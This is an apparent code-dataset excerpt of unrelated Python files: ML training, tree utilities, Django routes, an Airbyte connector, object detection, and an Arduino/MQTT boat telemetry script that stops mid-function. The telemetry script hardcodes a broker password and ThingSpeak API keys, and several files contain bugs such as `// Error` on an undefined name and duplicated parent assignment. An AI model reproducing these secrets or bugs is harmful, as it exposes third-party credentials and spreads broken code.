nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden, cell):\n output = self.embedding(input).view(1, 1, -1)\n output = F.relu(output)\n output, (decoder_hidden, decoder_cell) = self.lstm(output, (hidden, cell))\n output = self.out(output[0])\n output = self.softmax(output)\n return output, decoder_hidden, decoder_cell\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n \ndef train(model, inp_word, inp_te, outp_word, outp_te, optimizer, criterion, teacher_force_ratio, kl_w):\n \n \n encoder_hidden = torch.cat((model.encoder.initHidden(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n encoder_cell = torch.cat((model.encoder.initCell(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n \n optimizer.zero_grad()\n CEloss, KLloss = model(inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell, teacher_force_ratio, criterion)\n loss = CEloss + kl_w * KLloss\n loss.backward()\n optimizer.step()\n \n return CEloss, KLloss, loss\n\ndef test(model, testlist, epo):\n \n bleu_Score = 0\n pr = True\n if pr: print('Tense conversion')\n for test_choose in testlist:\n input_tensor = test_choose[0]\n target_tensor = test_choose[1]\n \n inp_word = input_tensor[0].to(device)\n inp_te = input_tensor[1].to(device)\n outp_word = target_tensor[0].to(device)\n outp_te = target_tensor[1].to(device)\n \n# print(input_tensor)\n# print(target_tensor)\n# inp_word, inp_te, outp_word, outp_te\n encoder_hidden = torch.cat((model.encoder.initHidden(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n encoder_cell = torch.cat((model.encoder.initCell(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n \n pred = model.eva8(inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell)\n pred_txt = idx2word(pred)\n label = idx2word(target_tensor[0])\n inp = idx2word(input_tensor[0])\n bleu_Score += compute_bleu(pred_txt, label)\n if pr:\n print('Input: {:13}Target: {:13}Prediction: {:13}'.format(inp, label, pred_txt))\n if pr:\n print('BLEU-4 score: {:.2f}'.format((bleu_Score/len(testlist)*100)))\n \n \n \n \n return bleu_Score/len(testlist)\n \n \ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n \n\n\ndef trainIters(model, n_iters, LR, path, print_every=2000, plot_every=200):\n start = time.time()\n plot_celosses = []\n plot_kllosses = []\n plot_bleu = []\n plot_gau = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n CEloss_t, KLloss_t = 0, 0\n best_bleu = 0.6\n best_gau = 0.05\n \n optimizer = optim.SGD(model.parameters(), lr=LR)\n \n train_list = getdatafromtxt(path,'train')\n test_list = comptestlist(getdatafromtxt(path,'test'))\n tenssss = torch.tensor([[0],[1],[2],[3]]).to(device)\n \n criterion = nn.CrossEntropyLoss()\n \n model.eval() \n torch.no_grad()\n bleu_score = test(model, test_list, iter)\n\n wordsss = model.gaussian_gen(MAX_LENGTH, tenssss)\n print(wordsss)\n gaussian_score = Gaussian_score(wordsss)\n \n print('bleu_score:{:.4f}, gaussian_score:{}'.format(bleu_score, gaussian_score))\n\n \n \n\n \ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nSOS_token = 0\nEOS_token = 1\n#----------Hyper Parameters----------#\nhidden_size = 256\n#The number of vocabulary\nvocab_size = 28\ncondition_size = 8\nlatent_size = 32\nLR = 0.1\npath = ''\n\n#------------\nt_startfrom = 15000\nt_most = 0.1\nklm_stf = 15000\nklm_m = 0.3\nklc_c = 2\nklc_m = 0.25\nKLD_weight_type = 'mono'\n\n\n# klm_stf, klm_m, klc_stf, klc_m\n\n\n# train_list = getdatafromtxt('')\n# training_pairs = [tensorsFromPair(random.randint(0, len(train_list)), train_list) for i in range(50)]\n\nvae = VAE(vocab_size, hidden_size, condition_size, latent_size).to(device)\n\n\nvae.load_state_dict(torch.load('bleumodel'))\ntrainIters(vae, 100000, LR, path, print_every=2000)\n","sub_path":"lab4/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":16507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394431498","text":"# tree_format_converter.py\n# Converts between different formats of trees\n\nfrom empress.topo_sort import Tree # Tree class\n\n# Edge-based format is the primary format used by eMPRess algorithms. This is the format that newickFormatReader.py\n# constructs from a .newick input file.\n# This format comprises a dictionary in which each key is either the string \"hTop\" (\"pTop\") for the edge corresponding to \n# the handl of a host (parasite) tree or an edge tuple of the form (v1, v2) where v1 and v2 are strings denoting the \n# name of the top and bottom vertices of that edge. Values are 4-tuples of the form (v1, v2, edge1, edge2) where \n# edge1 and edge2 are the edge tuples for the branches emanating from (v1, v2). If the branch terminates at a leaf\n# then edge1 and edge2 are both None.\n# See TreeTester.py for an example of this format.\n\n\ndef dict_to_tree(tree_dict, tree_type):\n \"\"\"\n :param tree_dict: An edge-based representation of a tree as in the example above.\n :param tree_type: Tree.TreeType.{HOST, PARASITE} indicating the type of the tree. This is used to \n determine if the handle of the tree is \"hTop\" (host) or \"pTop\" (parasite)\n :return: A representation of the tree in Tree format (see Tree.py)\n \"\"\"\n\n root = \"hTop\" if tree_type == Tree.TreeType.HOST else \"pTop\"\n output_tree = Tree.Tree()\n output_tree.tree_type = tree_type\n output_tree.root_node = dict_to_tree_helper(tree_dict, root)\n return output_tree\n\ndef dict_to_tree_helper(tree_dict, root_edge):\n \"\"\"\n Helper function for dict_to_tree.\n \"\"\"\n\n root_name = tree_dict[root_edge][1]\n new_node = Tree.Node(root_name)\n\n left_edge = tree_dict[root_edge][2] \n right_edge = tree_dict[root_edge][3] \n\n if left_edge is None and right_edge is None:\n return new_node\n else:\n new_left_node = dict_to_tree_helper(tree_dict, left_edge)\n new_right_node = dict_to_tree_helper(tree_dict, right_edge)\n new_node.left_node = new_left_node\n new_left_node.parent_node = new_node\n new_node.right_node = new_right_node\n new_left_node.parent_node = new_node\n return new_node\n","sub_path":"empress/topo_sort/tree_format_converter.py","file_name":"tree_format_converter.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"605735041","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n # client routes\n path('clients/', views.client_index, name='clients'),\n path('clients//', views.client_detail, name='client_detail'),\n path('clients/add', views.add_client, name='add_client'),\n path('clients//delete/', views.delete_client, name='delete_client'),\n path('clients//edit/', views.edit_client, name='edit_client'),\n # claim routes\n path('claims/', views.claim_index, name='claims'),\n path('claims//', views.claim_detail, name='claim_detail'),\n path('claims/add', views.add_claim, name='add_claim'),\n path('claims//delete', views.delete_claim, name='delete_claim'),\n path('claims//edit', views.edit_claim, name='edit_claim'),\n]\n","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431863778","text":"import collections\n\nwith open('../data/hightemp.txt', 'r') as data:\n n_data_1 = collections.defaultdict(lambda: 0)\n for line in data:\n data_1 = line.strip().replace('\\t', ' ').split()[0]\n n_data_1[data_1] += 1\ndata_sorted_1 = sorted(n_data_1.items(), key=lambda x: x[1], reverse = 1)\nfor line in data_sorted_1:\n print(' '.join(map(str, line)))\n\n# cut -f 1 ../data/hightemp.txt | sort | uniq -c | sort -nr #\n","sub_path":"Shi-ma/chapter02/knock19.py","file_name":"knock19.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"508446551","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport plotly.offline as py\nimport plotly.graph_objs as go\n\n\ndef show_plot(times_prim, times_kruskal, edges):\n trace0 = go.Scatter(\n x=edges,\n y=times_prim,\n name='Prim',\n line=dict(\n color=('rgb(205, 12, 24)'),\n width=4)\n )\n\n trace1 = go.Scatter(\n x=edges,\n y=times_kruskal,\n name='Kruskal',\n line=dict(\n color=('rgb(22, 96, 167)'),\n width=4,)\n )\n\n data = [trace0, trace1]\n\n layout = dict(title='Computational Efficiency of Algorithms',\n xaxis=dict(title='Number of Edges'),\n yaxis=dict(title='Running Time (s)'))\n\n fig = dict(data=data, layout=layout)\n py.plot(fig, 'my_plot.png')\n","sub_path":"src/create_plot.py","file_name":"create_plot.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"358499340","text":"import collections\n\n\nclass Node:\n\n def __init__(self, data):\n self.left = None\n self.right = None\n self.data = data\n\n def insert(self, data):\n if self.data:\n if data < self.data:\n if not self.left:\n self.left = Node(data)\n else:\n self.left.insert(data)\n elif data > self.data:\n if not self.right:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n self.data = data\n\n def print_tree(self):\n if self.left:\n self.left.print_tree()\n print(self.data)\n if self.right:\n self.right.print_tree()\n\n def in_order_traversal(self, root):\n \"\"\"LEFT --> ROOT --> RIGHT\"\"\"\n\n def in_order_traversal_helper(root):\n if root:\n in_order_traversal_helper(root.left)\n result.append(root.data)\n in_order_traversal_helper(root.right)\n\n result = []\n in_order_traversal_helper(root)\n return result\n\n def pre_order_traversal(self, root):\n \"\"\"ROOT --> LEFT --> RIGHT\"\"\"\n\n def pre_order_traversal_helper(root):\n if root:\n result.append(root.data)\n pre_order_traversal_helper(root.left)\n pre_order_traversal_helper(root.right)\n\n result = []\n pre_order_traversal_helper(root)\n return result\n\n def post_order_traversal(self, root):\n \"\"\"LEFT --> RIGHT --> ROOT\"\"\"\n\n def postorder_traversal_helper(root):\n if root:\n postorder_traversal_helper(root.left)\n postorder_traversal_helper(root.right)\n result.append(root.data)\n\n result = []\n postorder_traversal_helper(root)\n return result\n\n\ndef is_balanced_binary_tree(root):\n \"\"\"\n Recursively call the helper function.\n\n \"\"\"\n StatusWithHeight = collections.namedtuple(\"StatusWithHeight\",\n ('balanced', 'height'))\n\n def is_balanced_helper(root):\n \"\"\"\n Binary tree is balanced if for each node in the tree,\n the difference in the height of its left and right subtrees is\n at most 1.\n \"\"\"\n # base case\n if not root:\n return StatusWithHeight(True, -1)\n\n # left side\n left_result = is_balanced_helper(root.left)\n if not left_result.balanced:\n return StatusWithHeight(False, 0)\n\n # right side\n right_result = is_balanced_helper(root.right)\n if not right_result.balanced:\n return StatusWithHeight(False, 0)\n\n # get height and is balanced?\n height_difference = abs(left_result.height - right_result.height)\n balanced = True\n if height_difference > 1:\n balanced = False\n\n height = max(left_result.height, right_result.height) + 1\n\n return StatusWithHeight(balanced, height)\n\n return is_balanced_helper(root).balanced\n\n\ndef is_symmetric(tree):\n \"\"\"Is symmetric if the mirrored other side is the same.\"\"\"\n\n def is_symmetric_helper(subtree_0, subtree_1):\n if not subtree_0 and not subtree_1:\n return True\n elif subtree_0 and subtree_1:\n if (subtree_0.data == subtree_1.data\n and is_symmetric_helper(subtree_0.left, subtree_1.right)\n and is_symmetric_helper(subtree_0.right, subtree_1.left)):\n return True\n return False\n\n return not tree or is_symmetric_helper(tree.left, tree.right)\n\n\ndef lca(root, node1, node2):\n \"\"\"\n Find the lowest common ancestor of two given nodes.\n\n \"\"\"\n\n def lca_helper(root, node1, node2):\n \"\"\"\n Returns: [num_target_nodes, ancestor]\n\n \"\"\"\n if root is None:\n return [0, None]\n\n left_result = lca_helper(root.left, node1, node2)\n if left_result[0] == 2:\n return left_result\n right_result = lca_helper(root.right, node1, node2)\n if right_result[0] == 2:\n return right_result\n\n num_target_nodes = (\n left_result[0] + right_result[0] + (node1, node1).count(root)\n )\n\n return [num_target_nodes, root if num_target_nodes == 2 else None]\n\n return lca_helper(root, node1, node2)[1]\n\n\ndef lca_using_hash_map(node1, node2):\n \"\"\"Same. Only if .parent exists in nodes.\"\"\"\n iter1, iter2 = node1, node2\n\n seen_nodes = set()\n\n while iter1 and iter2:\n if iter1:\n if iter1 in seen_nodes:\n return iter1\n seen_nodes.add(iter1)\n iter1 = iter1.parent\n if iter2:\n if iter2 in seen_nodes:\n return iter2\n seen_nodes.add(iter2)\n iter2 = iter2.parent\n return None\n\n\ndef sum_root_to_leaf(root):\n \"\"\"\n i.e. for :: 1\n 2 4\n\n 1 -> 2 = 12\n 1 -> 4 = 14\n = 26\n\n You basically go and multiply the previous one with 10,\n since we are in base 10.\n Likewise with base 2 for binary.\n \"\"\"\n\n def sum_numbers_helper(root, partial_sum):\n if not root:\n return 0\n\n partial_sum = partial_sum * 10 + root.data\n\n if not root.left and not root.right:\n return partial_sum\n\n return (sum_numbers_helper(root.left, partial_sum)\n + sum_numbers_helper(root.right, partial_sum))\n\n return sum_numbers_helper(root, 0)\n\n\ndef sum_root_to_leaf(tree):\n \"\"\"For binary values.\"\"\"\n\n def sum_root_to_leaf_helper(tree, partial_sum=0):\n if not tree:\n return 0\n\n partial_sum = partial_sum * 2 + tree.data\n if not tree.left and not tree.right:\n return partial_sum\n\n return (sum_root_to_leaf_helper(tree.left, partial_sum) +\n sum_root_to_leaf_helper(tree.right, partial_sum))\n\n return sum_root_to_leaf_helper(tree)\n","sub_path":"binary_trees.py","file_name":"binary_trees.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"225738942","text":"#\n# Copyright (c) 2023 Airbyte, Inc., all rights reserved.\n#\n\nfrom dataclasses import dataclass\nfrom typing import Any, Iterable, Mapping, MutableMapping, Optional\n\nfrom airbyte_cdk.models import SyncMode\nfrom airbyte_cdk.sources.declarative.retrievers.simple_retriever import SimpleRetriever\nfrom airbyte_cdk.sources.declarative.stream_slicers import CartesianProductStreamSlicer\nfrom airbyte_cdk.sources.declarative.types import Record, StreamSlice\n\n\n@dataclass\nclass EventsSimpleRetriever(SimpleRetriever):\n def request_params(\n self,\n stream_state: StreamSlice,\n stream_slice: Optional[StreamSlice] = None,\n next_page_token: Optional[Mapping[str, Any]] = None,\n ) -> MutableMapping[str, Any]:\n \"\"\"Events API return records in descendent order (newest first).\n Default page limit is 100 items.\n\n Even though API mentions such pagination params as 'limit' and 'offset', they are actually ignored.\n Instead, response contains 'next' url with datetime range for next OLDER records, like:\n\n response:\n {\n \"next\": \"https://app.posthog.com/api/projects/2331/events?after=2021-01-01T00%3A00%3A00.000000Z&before=2021-05-29T16%3A44%3A43.175000%2B00%3A00\",\n \"results\": [\n {id ...},\n {id ...},\n ]\n }\n\n So if next_page_token is set (contains 'after'/'before' params),\n then stream_slice params ('after'/'before') should be ignored.\n \"\"\"\n\n if next_page_token:\n stream_slice = {}\n\n return self._get_request_options(\n stream_slice,\n next_page_token,\n self.requester.get_request_params,\n self.paginator.get_request_params,\n self.stream_slicer.get_request_params,\n )\n\n\n@dataclass\nclass EventsCartesianProductStreamSlicer(CartesianProductStreamSlicer):\n \"\"\"Connector requires support of nested state - each project should have own timestamp value, like:\n {\n \"project_id1\": {\n \"timestamp\": \"2021-02-01T10:21:35.003000Z\"\n },\n \"project_idX\": {\n \"timestamp\": \"2022-11-17:00:00.000000Z\"\n }\n }\n we also have to support old-style (before 0.1.8) states, like:\n {\n \"timestamp\": \"2021-17-01T10:21:35.003000Z\"\n }\n\n Slicer also produces separate datetime slices for each project\n \"\"\"\n\n def __post_init__(self, parameters: Mapping[str, Any]):\n self._cursor = {}\n self._parameters = parameters\n\n def get_stream_state(self) -> Mapping[str, Any]:\n return self._cursor or {}\n\n def update_cursor(self, stream_slice: StreamSlice, last_record: Optional[Record] = None):\n\n if not last_record:\n # this is actually initial stream state from CLI\n self._cursor = stream_slice\n return\n\n project_id = str(stream_slice.get(\"project_id\", \"\"))\n if project_id:\n current_cursor_value = self._cursor.get(project_id, {}).get(\"timestamp\", \"\")\n new_cursor_value = last_record.get(\"timestamp\", \"\")\n\n self._cursor[project_id] = {\"timestamp\": max(current_cursor_value, new_cursor_value)}\n\n def stream_slices(self, sync_mode: SyncMode, stream_state: Mapping[str, Any]) -> Iterable[Mapping[str, Any]]:\n \"\"\"Since each project has its own state, then we need to have a separate\n datetime slices for each project\n \"\"\"\n\n slices = []\n\n project_slicer, datetime_slicer = self.stream_slicers\n\n # support of old style state: it contains only a single 'timestamp' field\n old_style_state = stream_state if \"timestamp\" in stream_state else {}\n\n for project_slice in project_slicer.stream_slices(sync_mode, stream_state):\n project_id = str(project_slice.get(\"project_id\", \"\"))\n\n # use old_style_state if state does not contain states for each project\n project_state = stream_state.get(project_id, {}) or old_style_state\n\n # Each project should have own datetime slices depends on its state\n project_datetime_slices = datetime_slicer.stream_slices(sync_mode, project_state)\n\n # fix date ranges: start_time of next slice must be equal to end_time of previous slice\n if project_datetime_slices and project_state:\n project_datetime_slices[0][\"start_time\"] = project_state[\"timestamp\"]\n for i, datetime_slice in enumerate(project_datetime_slices[1:], start=1):\n datetime_slice[\"start_time\"] = project_datetime_slices[i - 1][\"end_time\"]\n\n # Add project id to each slice\n for datetime_slice in project_datetime_slices:\n datetime_slice[\"project_id\"] = project_id\n\n slices.extend(project_datetime_slices)\n\n return slices\n","sub_path":"dts/airbyte/airbyte-integrations/connectors/source-posthog/source_posthog/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50073906","text":"import tensorflow as tf\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\nimport cv2\r\n\r\ncap = cv2.VideoCapture(\"video\\\\aoe_iii_snow_hills.mp4\")\r\n\r\nfrom object_detection.utils import ops as utils_ops\r\nfrom utils import label_map_util\r\nfrom utils import visualization_utils as vis_util\r\n\r\nPATH_TO_FROZEN_GRAPH = \"inference_graph\\\\frozen_inference_graph.pb\"\r\nPATH_TO_LABELS = \"data/aoeiii_label_map.pbtxt\"\r\n\r\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=2, use_display_name=True)\r\ncategory_index = label_map_util.create_category_index(categories)\r\n\r\nimage_path = \"data\\\\bbox_train_hills_jpeg\\\\172.jpeg\"\r\nfeed_image = Image.open(image_path)\r\n\r\n# Memory management code\r\n\r\nconfig = tf.ConfigProto()\r\nconfig.gpu_options.allow_growth = True\r\ntf.reset_default_graph()\r\nsess = tf.Session(config=config)\r\n\r\n\r\n_INPUT_NAME = 'image_tensor'\r\n_OUTPUT_NAME = 'detection_boxes'\r\n\r\ndet_graph = sess.graph\r\nod_graph_def = tf.GraphDef()\r\n\r\n# read frozen graph\r\nwith tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, name='')\r\n\r\nall_nodes = [n.name for n in tf.get_default_graph().as_graph_def().node]\r\nprint(all_nodes)\r\n\r\nwhile True:\r\n ret, image_np = cap.read()\r\n _input = det_graph.get_tensor_by_name(_INPUT_NAME + \":0\")\r\n\r\n boxes = det_graph.get_tensor_by_name(_OUTPUT_NAME + \":0\")\r\n scores = det_graph.get_tensor_by_name('detection_scores:0')\r\n classes = det_graph.get_tensor_by_name('detection_classes:0')\r\n num_detections = det_graph.get_tensor_by_name('num_detections:0')\r\n\r\n image_np_expanded = np.expand_dims(image_np, axis=0)\r\n\r\n (boxes, scores, classes, num_detections) = sess.run([boxes, scores, classes, num_detections],feed_dict={_input: image_np_expanded})\r\n\r\n # print(boxes)\r\n # print(scores)\r\n # print(classes)\r\n print(num_detections)\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n feed_image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8)\r\n\r\n cv2.imshow('AOE III', image_np)\r\n if cv2.waitKey(25) & 0xFF == ord('q'):\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n break\r\n","sub_path":"run_on_image.py","file_name":"run_on_image.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49231671","text":"#!/usr/bin/python3\n\n\"\"\"\nMQTT topics must start with: EricssonONE/esignum/\nExample: \"EricssonONE/edallam/MQTT_Display/text\"\n\"\"\"\nfrom urllib2 import urlopen\n#from urllib.request import urlopen\nimport serial\nimport sys\nfrom time import sleep\nimport json \nimport datetime\n# For MQTT\nimport paho.mqtt.client as mqtt\nimport paho.mqtt.publish as publish\nfrom personal import *\n\n\n#the callback function\ndef on_connect(client, userdata, flags, rc):\n print(\"PUBLISH: Connected With Result Code {}\".format(rc))\n client.publish(topic = \"edallam/mmsi/boat/status\", payload=\"Online\", qos=0, retain=True) # TODO change to a publish that is with \"auth\"\n\ndef on_disconnect(client, userdata, rc):\n client.publish(topic = \"edallam/MQTT_Display/text\", payload = \"This is a test Message\")\n print(\"PUBLISH: Disconnected From Broker\")\n client.publish(topic = \"edallam/mmsi/boat/status\", payload=\"Offline - Disconnected\", qos=0, retain=True) # TODO change to a publish that is with \"auth\"\n\"\"\"\nMoved to personal.py\nbroker_address = \"iot.eclipse.org\"\nbroker_address = \"129.192.70.56\"\nMQTT_auth = {'username':\"edallam\", 'password':\"danielhackathon2019\"}\nbroker_portno = 1883\n# GET https://api.thingspeak.com/update?api_key=KEBDZO2LBQBJVV1Q&field1=0\nThingSpeak_Write_API_key = 'KEBDZO2LBQBJVV1Q'\nThingSpeak_Read_API_key ='5AYRZYT2BB16CBBW'\nThingSpeak_BaseURL = 'https://api.thingspeak.com/update?'\n\"\"\"\n\"\"\"\nconfig = getConfig()\nclient = mqtt.Client()\n#Assigning the object attribute to the Callback Function\nclient.will_set(\"EricssonONE/egarage/IoT_Can/status\", payload=\"Offline - Will\", qos=0, retain=True)\nclient.username_pw_set(username = \"edallam\", password = \"danielhackathon2019\")\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\nclient.connect(broker_address, broker_portno)\narduino1 = serial.Serial('/dev/ttyACM0',9600,timeout=100)\nprint(\"Listening to: \" + arduino1.name)\n#arduino2 = serial.Serial('/dev/ttyOP_arduino',9600,timeout=10)\n#print(\"Listening to: \" + arduino2.name)\n# URL where we will send the data, Don't change it\nbaseURL = ThingSpeak_BaseURL + 'api_key=%s' % ThingSpeak_Write_API_key\n\"\"\"\n# States and Global variables\n# BATTERY1\nbattery1_lastReportedValue = 0.0\n# BATTERY2\nbattery2_lastReportedValue = 0.0\n# SOLAR\nsolar_lastReportedValue = 0.0\n# DOOR\ndoor_lastReportedValue = 0\n# WATER\nwater_lastReportedValue = 0\n\n# ThingSpeak\nThingSpeak_reportingCounter = 1\nThingSpeak_unreportedChange = True\nfield1_str = ''\nfield2_str = ''\nfield3_str = ''\nfield4_str = ''\nfield5_str = ''\nfield6_str = ''\nfield7_str = ''\nfield8_str = ''\n\nclass serialList:\n def __init__(self):\n self.arduinoList = []\n\ndef startit():\n global ThingSpeak_reportingCounter\n\n global door_lastReportedValue\n\n client = mqtt.Client()\n\n config = getConfig()\n\n arduino1 = serial.Serial('/dev/ttyACM0',9600,timeout=100)\n #arduino2 = serial.Serial('/dev/ttyACM1',9600,timeout=100)\n #arduino3 = serial.Serial('/dev/ttyACM2',9600,timeout=100)\n #arduinoMain = [arduino1, arduino2, arduino3]\n\n #Assigning the object attribute to the Callback Function\n client.will_set(\"edallam/mmsi/boat/status\", payload=\"Offline - Will\", qos=0, retain=True)\n client.username_pw_set(username = config.MQTT_auth['username'], password = config.MQTT_auth['username'])\n client.on_connect = on_connect\n \n\n client.on_disconnect = on_disconnect\n\n client.connect(config.broker_address, config.broker_portno)\n\n\n\n while True:\n #try:\n #for x in arduino1:\n line = arduino1.readline().decode().replace('\\r\\n','')\n print(line)\n if startwith(line, 'edallam/BATTERY1'):\n data = decode_battery1(line)\n varning_battery1(data)\n publish_battery1(data)\n #signalk_battery1(data)\n if startwith(line, 'edallam/BATTERY2'):\n data = decode_battery1(line)\n varning_battery1(data)\n publish_battery1(data)\n if startwith(line, 'SOLAR'):\n data = decode_solar(line)\n publish_solar(data)\n if \"ejacsve/Temp[0]\" in line:\n data = decode_input(line)\n publish_display(\"Temperature\", data)\n if \"egebant/Distance\" in line:\n data = decode_input(line)\n topic = \"MQTT_TrashBin/Status\"\n if data >= 95 and data <= 110:\n publishMqttGeneric(topic, 'Bin is EMPTY')\n elif data >= 75 and data <= 80:\n publishMqttGeneric(topic, 'Bin is HALF FULL')\n elif data >= 20 and data <= 60:\n publishMqttGeneric(topic, 'Bin is FULL!, Collect Trash')\n else:\n publishMqttGeneric(topic, 'Sensor Placed Wrongly!')\n #publish_display(\"Distance\", data)\n if \"erohsat/lock\" in line:\n data = decode_input(line)\n topic = \"MQTT_WashRoomLock/Status\"\n if data == 1:\n publishMqttGeneric(topic, 'Occupied')\n else:\n publishMqttGeneric(topic, 'Free')\n #publish_display(\"Lock\", data)\n if startwith(line, 'edallam/DOOR'):\n data = decode_door(line)\n publish_door(data)\n \n else:\n print('No data received')\n send2ThingSpeak() \n #sleep(1)\n ThingSpeak_reportingCounter += 1\n \"\"\"\n except:\n print('Something went wrong. Retrying!')\n try:\n arduino1 = serial.Serial('/dev/ttyOP_devboard',9600,timeout=10)\n print(\"Listening to: \" + arduino1.name)\n except:\n print('Could not find arduino!')\n sleep(10)\n \"\"\"\n\n##################################################################\n\ndef publishMqttGeneric(topic, payload):\n config = getConfig()\n egarageTopic = \"EricssonONE/egarage/{}\".format(topic)\n\n publish.single(\\\n topic = egarageTopic, \\\n payload = payload, \\\n hostname = config.broker_address, \\\n client_id =\"\", \\\n keepalive = 60, \\\n will = None, \\\n auth = config.MQTT_auth, \\\n tls = None, \\\n protocol = mqtt.MQTTv311, \\\n transport = \"tcp\")\n\n print(\"Publish topic: {} payload: {}\".format(egarageTopic,payload)) \n\n##################################################################\n# Functions below\n##################################################################\n\n\ndef publish_display(name, data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global solar_lastReportedValue\n global field4_str\n print(\"data: {} lastValue: {}\".format(data, solar_lastReportedValue))\n if abs(data - solar_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n #solar_lastReportedValue = data\n data = '%.2f' % data\n field4_str = '&field4=%s' % (data)\n #topic = \"Water\"\n topic = \"MQTT_Display/temperature\"\n publishMqttDisplay(topic, name + \": \" + data);\n\n\n \ndef publishMqttDisplay(topic, payload):\n config = getConfig()\n egarageTopic = \"EricssonONE/egarage/{}\".format(topic)\n\n publish.single(\\\n topic = egarageTopic, \\\n payload = payload, \\\n hostname = config.broker_address, \\\n client_id =\"\", \\\n keepalive = 60, \\\n will = None, \\\n auth = config.MQTT_auth, \\\n tls = None, \\\n protocol = mqtt.MQTTv311, \\\n transport = \"tcp\")\n\n print(\"Publish topic: {} payload: {}\".format(egarageTopic,payload))\n \n##################################################################\n# Main battery \ndef decode_battery1(line):\n #print(line)\n data = float(line[10:])\n if isinstance(data, float):\n return data\n else:\n return float(0.0) // Error\n\ndef varning_battery1(data):\n if isinstance(data, float):\n return data\n else:\n return float(0.0) // Error\n \ndef publish_battery1(data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global battery1_lastReportedValue\n global field1_str\n if abs(data-battery1_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n battery1_lastReportedValue = data\n data = '%.2f' % data\n field1_str = '&field1=%s' % (data)\n\n\ndef signalk_battery1(data):\n diff = 0.1\n src_str = \"115\"\n pgn_str= \"128267\"\n path_str = \"electrical.batteries.0.voltage\"\n\n now = str(datetime.datetime.now())\n\n delta_message = json.loads(' { \"updates\":[ \\\n { \\\n \"source\": { \\\n \"device\": \"/dev/arduino\", \\\n \"src\": \"'+ src_str +'\", \"pgn\": \"'+ pgn_str +'\"}, \\\n \"timestamp\" : \"'+ str(now[:10] +'-'+ now[11:]) +'\", \\\n \"values\": [ \\\n { \\\n \"path\" : \"'+ path_str +' \", \"value\" : '+ str(data) +' \\\n } ] \\\n } \\\n ] }')\n print(delta_message)\n \n \n##################################################################\n# Solar panel\ndef decode_solar(line):\n data = float(line[7:])\n if isinstance(data, float):\n return data\n else:\n return float(0.0) // Error\n\ndef publish_solar(data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global solar_lastReportedValue\n global field4_str\n print(\"data: {} lastValue: {}\".format(data, solar_lastReportedValue))\n if abs(data - solar_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n solar_lastReportedValue = data\n data = '%.2f' % data\n field4_str = '&field4=%s' % (data)\n topic = \"Water\"\n topic = \"MQTT_Display/text\"\n publishMqttDisplay(topic, \"Solar\" + data);\n\n\n\n\n##################################################################\n# Water \ndef decode_water(line):\n data = int(line[18:])\n if isinstance(data, int):\n return data\n else:\n return 2 // Error\n\ndef decode_input(line):\n name, data = line.split(\": \")\n data = float(data)\n if isinstance(data, float):\n return data\n else:\n return 2 // Error\n\n\ndef publish_water(data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global water_lastReportedValue\n global field5_str\n if abs(data-water_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n water_lastReportedValue = data\n data = '%.2f' % data\n field5_str = '&field5=%s' % (data)\n\n##################################################################\n# Door\ndef decode_door(line):\n data = int(line[6:])\n if isinstance(data, int):\n return data\n else:\n return 2 // Error\n\ndef publish_door(data):\n 